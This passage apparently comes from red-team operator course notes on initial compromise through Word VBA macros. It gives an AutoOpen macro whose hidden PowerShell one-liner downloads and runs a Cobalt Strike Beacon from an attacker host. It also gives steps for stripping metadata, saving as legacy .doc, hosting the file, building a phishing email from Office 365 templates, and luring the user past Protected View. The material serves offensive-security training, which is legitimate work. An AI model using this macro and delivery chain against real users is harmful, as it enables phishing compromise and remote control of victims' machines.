5.

Visual Basic for Applications (VBA) Macros

#RTOv2 #RTO-Initial-Compromise

Visual Basic for Applications (VBA) Macros

VBA is an implementation of Visual Basic that is widely used with Microsoft Office apps - often
used to enhance functionality in Word and Excel for data processing. The prevalence of macros in
the commercial world is a double-edged sword when it comes to leveraging macros for malicious
purposes.
On one hand, the presence of a document with embedded macros is not necessarily suspicious;
but because they are used maliciously by threat actors, they are also given more scrutiny both
from technical products and in security awareness training.
You can create a macro in a Word document by going to View --> Macros --> Create. Change the
"Macros in" filed from "All active templates and documents" to "Document 1".
Give the Macro a name and click Create. To force the Macro to trigger automatically when the
document is opened, use the name AutoOpen:

Sub AutoOpen()

Dim Shell as Object

Set Shell = CreateObject("wscript.shell")

Shell.Run = "notepad"

End Sub

"wscript" is the Windows Script Host, which is designed for automation. The "shell" method
provides the ability to execute OS commands. To test the above code, use the play/pause/stop
buttons:
Next, we need to replace notepad with a Beacon payload. The easiest to leverage is the PowerShell
payload. In CS, go to Attacks --> Scripted Web Delivery (S) and generate a 64-bit PowerShell
payload for your HTTP listener. The URI path can be anything:

This generates a PowerShell payload and hosts it on the team server so it can be downloaded over
HTTP and executed in memory. After clicking Launch, CS will generate the PowerShell one-liner
that does just that:
Copy this into the HTA in place of the notepad and make sure to add another set of double quotes
around the IEX command:

Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object

net.webclient).downloadstring('http://nickelviper.com/a'))"""

To prepare the document for delivery, go to File --> Info --> Inspect Document which brings up
the Document Inspector. Click Inspect and then Remove All next to Document Properties and
Personal Information - this prevents the username on your system being embedded into the
document.

Next, go to File --> Save As and save it to C:\Payloads. Name it anything but change the format
from .docx to Word 97-2003 (.doc).

This is because you cannot save macros inside a .docx and there is a stigma around the macro-
enabled .docm extension. The legacy extension works best.

We then want to upload this file to the team server as well. Go to Site Management --> Host File
and select your document:
Even though the WYSIWYG text editor in OWA supports HTML, it is not very good for composing
rich HTML-based emails. About the best it has are basic formatting options, but there is a bit of a
hacky workaround and that is to use a pre-made HTML template.
For example, here are some HTML templates based around Office 365 (a copy can also be found
in C:\Tools\PhishingTemplates).
Open one of them, e.g. Word.html in Edge or another browser. Amazingly, what you can do is
CTRL+A and CTRL+C to copy the content, and then CTRL+V to paste it directly into the OWA text
editor. All the text and image formatting should be preserved:
Once edited and the hyperlink is placed (http://nickelviper.com/ProductReport.doc), we can email
it to Bob Farmer.
Next, log into Workstation 2 as Bob, launch Outlook and the email will arrive:

Clicking the link will open Edge and automatically download the document. Because the file is
being downloaded via a browser, it will have the MOTW. So, when opened, it will first be in
Protected View:
The user must first click Enable Editing and then on Enable Content to execute the macro. If you
attach the document directly to the email, it will not have MOTW and therefore not open in
Protected View:

Many real life samples you try to entice the user to click this button - usually saying something
along the lines of "Security Product XYZ has scanned the content and deemed it to be safe. To
reveal the content, click Enable Content.""
Once clicked, a PowerShell window will open briefly and then vanish. A new beacon will appear in
CS: